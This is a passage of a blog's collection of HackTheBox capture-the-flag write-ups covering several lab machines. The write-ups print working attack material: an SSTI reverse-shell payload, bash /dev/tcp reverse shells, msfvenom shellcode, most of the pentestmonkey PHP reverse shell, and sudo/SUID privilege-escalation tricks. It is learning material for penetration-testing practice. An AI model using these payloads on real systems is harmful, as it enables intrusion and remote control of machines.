Escalation\n","date":"17 December 2025","externalUrl":null,"permalink":"/ctf-writeups/help/","section":"CTF Writeups","summary":"","title":"Help","type":"ctf-writeups"},{"content":" sau # Overview # OS: Linux IP: 10.129.229.26 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # SSRF through request-baskets to reach a service on the filtered port 80, an RCE in that service, then a pager-based shell escape through sudo for root.\nLoot # | ssh-hostkey: | 3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA) | 256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA) |_ 256 
b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)\nEnumeration Nmap scan Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-15 10:39 EST Nmap scan report for 10.129.229.26 Host is up (0.19s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) 80/tcp filtered http 55555/tcp open unknown | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 400 Bad Request | Content-Type: text/plain; charset=utf-8 | X-Content-Type-Options: nosniff | Date: Mon, 15 Dec 2025 15:40:21 GMT | Content-Length: 75 | invalid basket name; the name does not match pattern: ^[wd-_\\.]{1,250}$ | GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 302 Found | Content-Type: text/html; charset=utf-8 | Location: /web | Date: Mon, 15 Dec 2025 15:39:51 GMT | Content-Length: 27 | href=\u0026#34;/web\u0026#34;\u0026gt;Found\u0026lt;/a\u0026gt;. | HTTPOptions: | HTTP/1.0 200 OK | Allow: GET, OPTIONS | Date: Mon, 15 Dec 2025 15:39:52 GMT |_ Content-Length: 0 1 service unrecognized despite returning data. 
If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port55555-TCP:V=7.94SVN%I=7%D=12/15%Time=69402BC6%P=x86_64-pc-linux-gnu SF:%r(GetRequest,A2,\u0026#34;HTTP/1\\.0\\x20302\\x20Found\\r\\nContent-Type:\\x20text/ht SF:ml;\\x20charset=utf-8\\r\\nLocation:\\x20/web\\r\\nDate:\\x20Mon,\\x2015\\x20Dec SF:\\x202025\\x2015:39:51\\x20GMT\\r\\nContent-Length:\\x2027\\r\\n\\r\\n\u0026lt;a\\x20href= SF:\\\u0026#34;/web\\\u0026#34;\u0026gt;Found\u0026lt;/a\u0026gt;\\.\\n\\n\u0026#34;)%r(GenericLines,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x SF:20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnectio SF:n:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(HTTPOptions,60,\u0026#34;HTTP/1\\.0\\ SF:x20200\\x20OK\\r\\nAllow:\\x20GET,\\x20OPTIONS\\r\\nDate:\\x20Mon,\\x2015\\x20Dec SF:\\x202025\\x2015:39:52\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSPReq SF:uest,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/pl SF:ain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Requ SF:est\u0026#34;)%r(Help,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x2 SF:0text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad SF:\\x20Request\u0026#34;)%r(SSLSessionReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\ SF:nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\ SF:r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(TerminalServerCookie,67,\u0026#34;HTTP/1\\.1\\x20 SF:400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\ SF:r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(TLSSessionReq, SF:67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\ SF:x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;) 
SF:%r(Kerberos,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20 SF:text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\ SF:x20Request\u0026#34;)%r(FourOhFourRequest,EA,\u0026#34;HTTP/1\\.0\\x20400\\x20Bad\\x20Request SF:\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nX-Content-Type-Opt SF:ions:\\x20nosniff\\r\\nDate:\\x20Mon,\\x2015\\x20Dec\\x202025\\x2015:40:21\\x20G SF:MT\\r\\nContent-Length:\\x2075\\r\\n\\r\\ninvalid\\x20basket\\x20name;\\x20the\\x2 SF:0name\\x20does\\x20not\\x20match\\x20pattern:\\x20\\^\\[\\\\w\\\\d\\\\-_\\\\\\.\\]{1,250 SF:}\\$\\n\u0026#34;)%r(LPDString,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-T SF:ype:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400 SF:\\x20Bad\\x20Request\u0026#34;)%r(LDAPSearchReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Req SF:uest\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x2 SF:0close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;); No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 8888/tcp) HOP RTT ADDRESS 1 188.02 ms 10.10.14.1 2 188.10 ms 10.129.229.26 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 122.80 seconds\nDir # The page footer shows the app is request-baskets and gives its version.\nA user creates a basket; the basket UI then records every request sent to the basket URL and displays it.\nVulnerabilities # Public CVE exploit: CVE-2023-27163, SSRF through the forward_url setting of a basket.\nwget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh\nThis script creates a basket that forwards to a URL of our choice, which gives us the SSRF.\nExploitation # Visiting the basket now returns the content of the service on the filtered port 80.\nWe found a public RCE exploit for the version that service reports.\nNow let us grab the flags.\nPrivesc # sudo lets us run systemctl status, and systemctl pipes its output to a pager:\nthe pager is less by default; less allows a shell escape with !; when it is run via sudo, that shell runs as root. So we escalate from a read-only command via the pager.\n","date":"15 December 2025","externalUrl":null,"permalink":"/ctf-writeups/sau/","section":"CTF Writeups","summary":"","title":"sau","type":"ctf-writeups"},{"content":" irked # Overview # OS: Linux IP: 10.10.10.117 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # Enumerated the box, found a backdoor in the UnrealIRCd service and got a shell, found the password for a steg backup, learnt to use steghide to pull the hidden data out of an image, which gave me SSH access, and elevated to root through a SUID binary called viewuser.\nEnumeration # Nmap scan results\nBecause HTB asks us what is running on port 8067, let us check that port too, since the first scan did not return it.\nhomepage\ndirbusting\n/man page\nVulnerabilities # Exploitation # Looking at the backdoor we found earlier: the trojaned UnrealIRCd checks whether a received line starts with the two bytes AB and, if so, passes the whole line to system(). So a payload of the form AB;\u0026lt;command\u0026gt; runs our command (the shell fails on the AB token and then runs what follows the semicolon), which should get us a reverse shell, so let us try it.\nFirst we set up a listener to confirm the command runs.\nIt works.\nNow for the reverse shell.\nAnd we have our shell.\nWe do not have permission to read the user flag, so on to privesc.\nWe find the password of some super 
elite backup??\nUPupDOWNdownLRlrBAbaSSss\nsince it seems to be referencing steg, let's use the steghide tool on the image which was on the homepage\nlet's try switching to the other user with this password now\nok so using su directly did not work\nbut we were able to log in via ssh\nwe got our user flag, now let's try elevating for grabbing the root flag\nwe host linpeas from our box using a simple python server and then use wget to grab it.\nwe find something called /usr/bin/viewuser which looks interesting, let's try running it\nThis binary had a SUID (Set owner User ID) flag set. It basically meant anyone who runs the application would be given a temporary privilege as the owner of the file/program. As the owner of this file is root, our user would be given temporary permission as root. -@rblayke1\nit gives us an error saying not found\nok so it was looking for a listusers file to execute, we created our own listusers file with the bash shell that we need, it executes that as root and gives us a root shell.\nroot flag\n","date":"29 September 2024","externalUrl":null,"permalink":"/ctf-writeups/irked/","section":"CTF Writeups","summary":"","title":"irked","type":"ctf-writeups"},{"content":" remote # Overview # OS: Windows IP: 10.10.10.180 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # learnt how to mount something using nfs, used hashcat to crack admin creds which I found from the backup file in the mount, used an authenticated rce exploit to get nc.exe on the box with powershell and then got a basic shell, learnt to escalate privs by exploiting the self-impersonate priv using printspoofer.exe.\nEnumeration # nmap scan results\nhomepage\nlogin portal\non a bit of enumerating we find this portal\nVulnerabilities Exploitation # since nfs is running on the box, let's check for mounts\nok there is something called site_backups, let's check it out\nPoking around a bit, there’s an .sdf file in /App_Data called Umbraco.sdf. 
.sdf files are standard database format files. I don’t know a great way to parse these files, but strings shows some interesting results right at the top of the file: -0xdf\nby looking at this we can make out the user is\nemail admin@htb.local\nand the password hash is\nb8be16afba8c314ad33d812f22a04991b90e2aaa with SHA1\nand another user smith with password hash jxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts\nstored using HMACSHA256.\nok so when we break it with hashcat we find that the pass is baconandcheese\nthese creds let us in\nwe can now try this vuln we found earlier\non trying a simple whoami command\nnice, we have RCE\nlet's get nc.exe via powershell\nannnd we have our user flag\nnow let's try priv esc\nlet's exploit this by using printspoofer\nGitHub - itm4n/PrintSpoofer: Abusing impersonation privileges through the \u0026ldquo;Printer Bug\u0026rdquo;\nlet's get this printspoofer on our system as print.exe the same way we got our nc\ntime to grab our root flag\npwned\n","date":"29 September 2024","externalUrl":null,"permalink":"/ctf-writeups/remote/","section":"CTF Writeups","summary":"","title":"remote","type":"ctf-writeups"},{"content":" knife # Overview # OS: Linux IP: 10.10.10.242 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # User agentt exploit.\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap scan results\nhomepage + php version\nVulnerabilities # I validated this step using the evidence below before moving forward in the chain.\nExploitation # let's use the UserAgentt Exploit\nand just like that we have our shell\nok so we got a shell as james and we can run /usr/bin/knife as root?\nthis shell we got is very unstable, I can't even traverse directories, let's try getting it manually without the use of this script.\nsending this request via burpsuite gets us our shell\nlet's use this exploit to upgrade our shell sudo knife exec -E \u0026ldquo;exec 
\u0026lsquo;/bin/bash\u0026rsquo;\u0026rdquo;\nuser and root flag\n","date":"21 September 2024","externalUrl":null,"permalink":"/ctf-writeups/knife/","section":"CTF Writeups","summary":"","title":"knife","type":"ctf-writeups"},{"content":" Mirai # Overview # OS: Linux IP: 10.10.10.48 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # learnt how to recover data that was deleted from a usb stick, also learnt how to check for devices that are mounted.\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap scan results\ndirsearch\n.admin\nVulnerabilities # Exploitation # let's try the raspberry pi default creds and try to log in through ssh\nand boom we are in\nand we have our user flag\nsurprisingly we can run any command as root, so let's get a root shell with sudo su -\nok so it seems to be on a usb stick?\nnice, we have to perform some recovery\nstrings /dev/sdb -n 32 will grab us the root flag assuming that when the flag was deleted it was not overwritten with null values and instead the metadata was just removed.\nand boom root flag\npwned\n","date":"20 September 2024","externalUrl":null,"permalink":"/ctf-writeups/mirai/","section":"CTF Writeups","summary":"","title":"Mirai","type":"ctf-writeups"},{"content":" Devoops # Overview # OS: Linux IP: 10.10.10.x Difficulty: Medium Platform: HackTheBox OSCP: No Lists: N/A Summary # -.\nEnumeration # Vulnerabilities # Exploitation # ","date":"14 September 2024","externalUrl":null,"permalink":"/ctf-writeups/devoops/","section":"CTF Writeups","summary":"","title":"Devoops","type":"ctf-writeups"},{"content":" doctor # Overview # OS: Linux IP: 10.10.10.209 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # learnt how to exploit this using ssti ( server side template injection ), used a splunk exploit called splunkwhisperer2 to get root shell.\nEnumeration # nmap scan results\ndirsearch\nnothing too useful\nchecking out port 8089\nwe 
find here that the version of splunk that is running is 8.0.5\nwe also notice that there could be a domain with the name doctors.htb\nlet's add this to our /etc/hosts file and visit it\nand oop we got a login page on this site, this may be useful later on\nVulnerability Exploitation # the admin login panel page had a place where we could sign up, let's do that\nand we come across this page where we can create new posts\nok we put up a test post, now let's look around more\non looking at the source page we can tell that there is a directory that exists called /archive\nthe page shows nothing\nbut the source code shows us this\nso whatever we post is being reflected here\nlet's try an SSTI, a template injection\nssti :- server side template injection\nhere is our ssti chart\nlet's try posting this, if it's vulnerable then it should show 5, 5 times in the archive.\nand it does, let's try an SSTI rev shell payload now\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Template Injection/README.md\nwe can use this one\n{% for x in ().__class__.__base__.__subclasses__() %}{% if \u0026#34;warning\u0026#34; in x.__name__ %}{{x()._module.__builtins__[\u0026#39;__import__\u0026#39;](\u0026#39;os\u0026#39;).popen(\u0026#34;python3 -c \u0026#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\u0026#34;ip\\\u0026#34;,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\u0026#34;/bin/cat\\\u0026#34;, \\\u0026#34;flag.txt\\\u0026#34;]);\u0026#39;\u0026#34;).read().zfill(417)}}{%endif%}{% endfor %} we have to make some tweaks like specifying our ip and changing cat to bash along with the -i option for a stable shell\nnow after we post it, we trigger the payload by refreshing the archive page, but remember to set up your netcat first\nand there we go, we have our basic shell\nookk so we don't even have the perms for viewing a user file.\nlet's get linpeas on the box and try to escalate 
our privs.\nafter changing the perms of linpeas with chmod +x linpeas.sh\nwe run it with ./linpeas.sh\nnow let's see if we find anything interesting\nok so we find a password from the logs that is Guitar123 and we know that a user exists with the name shaun.\nlet's try these credentials on ssh\ndoes noooot seem to work, let's try on our prev shell with su\nand we are in, let's grab our user flag first\nnow let's go for escalating for our root flag\nremember we had come across a splunk page on port 8089 before? let's visit that now\nlet's try these creds here as well\nand wow it worked\nok cool we can now start to use the splunkwhisperer2 payload we found earlier\ngit clone this https://github.com/cnotin/SplunkWhisperer2.git\nlet's use remote and exec a rev shell payload\nwe will use this payload bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.39/8080 0\u0026gt;\u0026amp;1\npython3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.39 --username shaun --password Guitar123 --payload \u0026#34;bash -c \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.39/8080 0\u0026gt;\u0026amp;1\u0026#39;\u0026#34; annnnd we have our root shell\nok now time to grab the flag\nroot flag\n","date":"7 September 2024","externalUrl":null,"permalink":"/ctf-writeups/doctor/","section":"CTF Writeups","summary":"","title":"doctor","type":"ctf-writeups"},{"content":" buff # Overview # OS: Windows IP: 10.10.10.198 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # learnt how to port forward with chisel, update buffer exploit with own payload.\nEnumeration # nmap scan result\nlet's add 10.10.10.198 to our hosts\ndirsearch results\nhomepage\ncontact page contents\nVulnerability gym management\nExploitation # alright so using the unauthenticated remote code execution exploit\nwe have gotten ourselves a foothold\nlet's upgrade our shell by first getting nc.exe on our box\nusing nc now\nnow that we got our shell let's get our user flag\nUser Flag\nrunning netstat -an gives us 
this\nwe notice that there is something running on ports 8888 and 3306\nwe also find this executable file in shaun's downloads folder.\nrunning tasklist /v shows us that cloudme is running right now\nfor cloudme we find this exploit\nhttps://www.exploit-db.com/exploits/48389\nwhich runs only on a port that can only be locally accessed right now, port 8888.\nlet's use Chisel to port forward our target's port 8888 to our kali machine's port 8888\nlet's go here https://github.com/jpillora/chisel/releases\nand grab this\nlet's grab the windows one as well\ngunzip both of them and give them perms with chmod\nnow get the windows one on the box\nnow on our kali box we will run this\n./chisel_1.6.0_linux_amd64 server -p 8000 --reverse\nand on our buff box we run this\nchisel.exe client 10.10.14.20:8000 R:8888:localhost:8888\nnice we got our connection\nnetstat -anlp | grep 8888\nthis will tell us if it is connected\nand yup we are\nok now let's look at the exploits available for cloudme\nlet's use the first one which is the buffer overflow proof of concept\nok so apparently only the shellcode needs to be updated\nlet's generate one using msfvenom\nmsfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.23 LPORT=443 -b \u0026#39;\\x00\\x0A\\x0D\u0026#39; -f python -v payload\npayload = b\u0026#34;\u0026#34; payload += b\u0026#34;\\xbd\\x5c\\x4f\\xd7\\xd9\\xda\\xda\\xd9\\x74\\x24\\xf4\u0026#34; payload += b\u0026#34;\\x58\\x33\\xc9\\xb1\\x52\\x31\\x68\\x12\\x03\\x68\\x12\u0026#34; payload += b\u0026#34;\\x83\\x9c\\x4b\\x35\\x2c\\xe0\\xbc\\x3b\\xcf\\x18\\x3d\u0026#34; payload += b\u0026#34;\\x5c\\x59\\xfd\\x0c\\x5c\\x3d\\x76\\x3e\\x6c\\x35\\xda\u0026#34; payload += b\u0026#34;\\xb3\\x07\\x1b\\xce\\x40\\x65\\xb4\\xe1\\xe1\\xc0\\xe2\u0026#34; payload += b\u0026#34;\\xcc\\xf2\\x79\\xd6\\x4f\\x71\\x80\\x0b\\xaf\\x48\\x4b\u0026#34; payload += b\u0026#34;\\x5e\\xae\\x8d\\xb6\\x93\\xe2\\x46\\xbc\\x06\\x12\\xe2\u0026#34; payload += 
b\u0026#34;\\x88\\x9a\\x99\\xb8\\x1d\\x9b\\x7e\\x08\\x1f\\x8a\\xd1\u0026#34; payload += b\u0026#34;\\x02\\x46\\x0c\\xd0\\xc7\\xf2\\x05\\xca\\x04\\x3e\\xdf\u0026#34; payload += b\u0026#34;\\x61\\xfe\\xb4\\xde\\xa3\\xce\\x35\\x4c\\x8a\\xfe\\xc7\u0026#34; payload += b\u0026#34;\\x8c\\xcb\\x39\\x38\\xfb\\x25\\x3a\\xc5\\xfc\\xf2\\x40\u0026#34; payload += b\u0026#34;\\x11\\x88\\xe0\\xe3\\xd2\\x2a\\xcc\\x12\\x36\\xac\\x87\u0026#34; payload += b\u0026#34;\\x19\\xf3\\xba\\xcf\\x3d\\x02\\x6e\\x64\\x39\\x8f\\x91\u0026#34; payload += b\u0026#34;\\xaa\\xcb\\xcb\\xb5\\x6e\\x97\\x88\\xd4\\x37\\x7d\\x7e\u0026#34; payload += b\u0026#34;\\xe8\\x27\\xde\\xdf\\x4c\\x2c\\xf3\\x34\\xfd\\x6f\\x9c\u0026#34; payload += b\u0026#34;\\xf9\\xcc\\x8f\\x5c\\x96\\x47\\xfc\\x6e\\x39\\xfc\\x6a\u0026#34; payload += b\u0026#34;\\xc3\\xb2\\xda\\x6d\\x24\\xe9\\x9b\\xe1\\xdb\\x12\\xdc\u0026#34; payload += b\u0026#34;\\x28\\x18\\x46\\x8c\\x42\\x89\\xe7\\x47\\x92\\x36\\x32\u0026#34; payload += b\u0026#34;\\xc7\\xc2\\x98\\xed\\xa8\\xb2\\x58\\x5e\\x41\\xd8\\x56\u0026#34; payload += b\u0026#34;\\x81\\x71\\xe3\\xbc\\xaa\\x18\\x1e\\x57\\xdf\\xd6\\x2e\u0026#34; payload += b\u0026#34;\\xb0\\xb7\\xe4\\x2e\\xbf\\xfc\\x60\\xc8\\xd5\\x12\\x25\u0026#34; payload += b\u0026#34;\\x43\\x42\\x8a\\x6c\\x1f\\xf3\\x53\\xbb\\x5a\\x33\\xdf\u0026#34; payload += b\u0026#34;\\x48\\x9b\\xfa\\x28\\x24\\x8f\\x6b\\xd9\\x73\\xed\\x3a\u0026#34; payload += b\u0026#34;\\xe6\\xa9\\x99\\xa1\\x75\\x36\\x59\\xaf\\x65\\xe1\\x0e\u0026#34; payload += b\u0026#34;\\xf8\\x58\\xf8\\xda\\x14\\xc2\\x52\\xf8\\xe4\\x92\\x9d\u0026#34; payload += b\u0026#34;\\xb8\\x32\\x67\\x23\\x41\\xb6\\xd3\\x07\\x51\\x0e\\xdb\u0026#34; payload += b\u0026#34;\\x03\\x05\\xde\\x8a\\xdd\\xf3\\x98\\x64\\xac\\xad\\x72\u0026#34; payload += b\u0026#34;\\xda\\x66\\x39\\x02\\x10\\xb9\\x3f\\x0b\\x7d\\x4f\\xdf\u0026#34; payload += b\u0026#34;\\xba\\x28\\x16\\xe0\\x73\\xbd\\x9e\\x99\\x69\\x5d\\x60\u0026#34; payload += 
b\u0026#34;\\x70\\x2a\\x6d\\x2b\\xd8\\x1b\\xe6\\xf2\\x89\\x19\\x6b\u0026#34; payload += b\u0026#34;\\x05\\x64\\x5d\\x92\\x86\\x8c\\x1e\\x61\\x96\\xe5\\x1b\u0026#34; payload += b\u0026#34;\\x2d\\x10\\x16\\x56\\x3e\\xf5\\x18\\xc5\\x3f\\xdc\u0026#34; this is the payload we are getting, now let's update the script\naannnnd we have our admin shell on 443\nRoot flag\n","date":"3 September 2024","externalUrl":null,"permalink":"/ctf-writeups/buff/","section":"CTF Writeups","summary":"","title":"buff","type":"ctf-writeups"},{"content":" swagshop # Overview # OS: Linux IP: 10.10.10.140 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # to be continued.\nEnumeration # nmap results\nadding 10.10.10.140 swagshop.htb to our /etc/hosts file we are able to access the site\ndirsearch\nRelease_notes.txt directory\nok so I thought this site would be useful for getting the version of Magento running, but no, it's redirecting us to another site to get the current release notes, which makes this useless.\nlet's try using a tool called magescan instead to get the version\nfollow these commands\nsudo apt update sudo apt install php-cli -y wget https://github.com/steverobbins/magescan/releases/latest/download/magescan.phar chmod +x magescan.phar ./magescan.phar nice, our magento version is 1.9.0.0\noh wow we got some db credentials from the local xml directory we found from dirbusting.\nroot:fMVWh7bDHpgZkyfqQXreTjU9\ndbname:swagshop\nkey:b355a9e0cd018d3f7f03607141518419\nVulnerabilities # let's check out the remote code exec one\nshoplift\nExploitation # ok let's check out this and see if there are any changes that have to be made to the script.\nlet's see if we can access that link specified as the target url\nok so we can't access the page, let's try\non messing with the site\nI realized that any page that I visit has index.php being added at the start of the url, let's try adding that to the target url and see if we can access the page or not.\nand boom it works, let's change this in 
the script accordingly\nfirst remove these unnecessary characters\nok so once this script executes it will create another account with these credentials for us to log in with.\nok now let's run it\nok wow it worked, let's try those credentials now\nwe are getting this page??\noh nvm on pressing the back page button we are greeted with this\nwe are in the admin panel!\nremember we came across some magento exploit that required us to be authenticated?\nnow that we are authenticated, let's visit that\nlet's get the exact date from the local xml file\ncomment the first few lines out and add these lines to the script\nchange from 7d to 2y here as there were no orders in the past 2 years\nok we are ready to run the script now\nlet's fix this error\nkept getting this error, got frustrated will attempt again\n","date":"29 August 2024","externalUrl":null,"permalink":"/ctf-writeups/swagshop/","section":"CTF Writeups","summary":"","title":"swagshop","type":"ctf-writeups"},{"content":" Networked # Overview # OS: Linux IP: 10.10.10.146 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # learnt to upload a content type payload with the extension .png.\nEnumeration # nmap scan results\nhomepage\ndirsearch\n/backup\n/photos\n/upload\nVulnerabilities # Exploitation # ok so on examining upload.php apparently the validation is only done by extension\n//$name = $_SERVER[\u0026#39;REMOTE_ADDR\u0026#39;].\u0026#39;-\u0026#39;. $myFile[\u0026#34;name\u0026#34;]; list ($foo,$ext) = getnameUpload($myFile[\u0026#34;name\u0026#34;]); $validext = array(\u0026#39;.jpg\u0026#39;, \u0026#39;.png\u0026#39;, \u0026#39;.gif\u0026#39;, \u0026#39;.jpeg\u0026#39;); $valid = false; foreach ($validext as $vext) { if (substr_compare($myFile[\u0026#34;name\u0026#34;], $vext, -strlen($vext)) === 0) { $valid = true; } and permissions are being set on the uploaded files\n// set proper permissions on the new file chmod(UPLOAD_DIR . 
$name, 0644); let's try uploading a shell, first let's get the php reverse shell from pentestmonkey\n\u0026lt;?php // php-reverse-shell - A Reverse Shell implementation in PHP // Copyright (C) 2007 pentestmonkey@pentestmonkey.net // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. The author accepts no liability // for damage caused by this tool. If these terms are not acceptable to you, then // do not use this tool. // // In all other respects the GPL version 2 applies: // // This program is free software; you can redistribute it and/or modify // it under the terms of the GNU General Public License version 2 as // published by the Free Software Foundation. // // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License along // with this program; if not, write to the Free Software Foundation, Inc., // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. If these terms are not acceptable to // you, then do not use this tool. // // You are encouraged to send comments, improvements or suggestions to // me at pentestmonkey@pentestmonkey.net // // Description // ----------- // This script will make an outbound TCP connection to a hardcoded IP and port. // The recipient will be given a shell running as the current user (apache normally). // // Limitations // ----------- // proc_open and stream_set_blocking require PHP version 4.3+, or 5+ // Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows. 
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available. // // Usage // ----- // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck. set_time_limit (0); $VERSION = \u0026#34;1.0\u0026#34;; $ip = \u0026#39;127.0.0.1\u0026#39;; // CHANGE THIS $port = 1234; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = \u0026#39;uname -a; w; id; /bin/sh -i\u0026#39;; $daemon = 0; $debug = 0; // // Daemonise ourself if possible to avoid zombies later // // pcntl_fork is hardly ever available, but will allow us to daemonise // our php process and avoid zombies. Worth a try... if (function_exists(\u0026#39;pcntl_fork\u0026#39;)) { // Fork and have the parent process exit $pid = pcntl_fork(); if ($pid == -1) { printit(\u0026#34;ERROR: Can\u0026#39;t fork\u0026#34;); exit(1); } if ($pid) { exit(0); // Parent exits } // Make the current process a session leader // Will only succeed if we forked if (posix_setsid() == -1) { printit(\u0026#34;Error: Can\u0026#39;t setsid()\u0026#34;); exit(1); } $daemon = 1; } else { printit(\u0026#34;WARNING: Failed to daemonise. This is quite common and not fatal.\u0026#34;); } // Change to a safe directory chdir(\u0026#34;/\u0026#34;); // Remove any umask we inherited umask(0); // // Do the reverse shell... 
// // Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit(\u0026#34;$errstr ($errno)\u0026#34;); exit(1); } // Spawn shell process $descriptorspec = array( 0 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;r\u0026#34;), // stdin is a pipe that the child will read from 1 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;w\u0026#34;), // stdout is a pipe that the child will write to 2 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;w\u0026#34;) // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit(\u0026#34;ERROR: Can\u0026#39;t spawn shell\u0026#34;); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won\u0026#39;t stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit(\u0026#34;Successfully opened reverse shell to $ip:$port\u0026#34;); while (1) { // Check for end of TCP connection if (feof($sock)) { printit(\u0026#34;ERROR: Shell connection terminated\u0026#34;); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit(\u0026#34;ERROR: Shell process terminated\u0026#34;); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process\u0026#39;s STDIN if (in_array($sock, $read_a)) { if ($debug) printit(\u0026#34;SOCK READ\u0026#34;); $input = fread($sock, $chunk_size); if ($debug) printit(\u0026#34;SOCK: $input\u0026#34;); fwrite($pipes[0], $input); } // If we can read from the process\u0026#39;s STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit(\u0026#34;STDOUT 
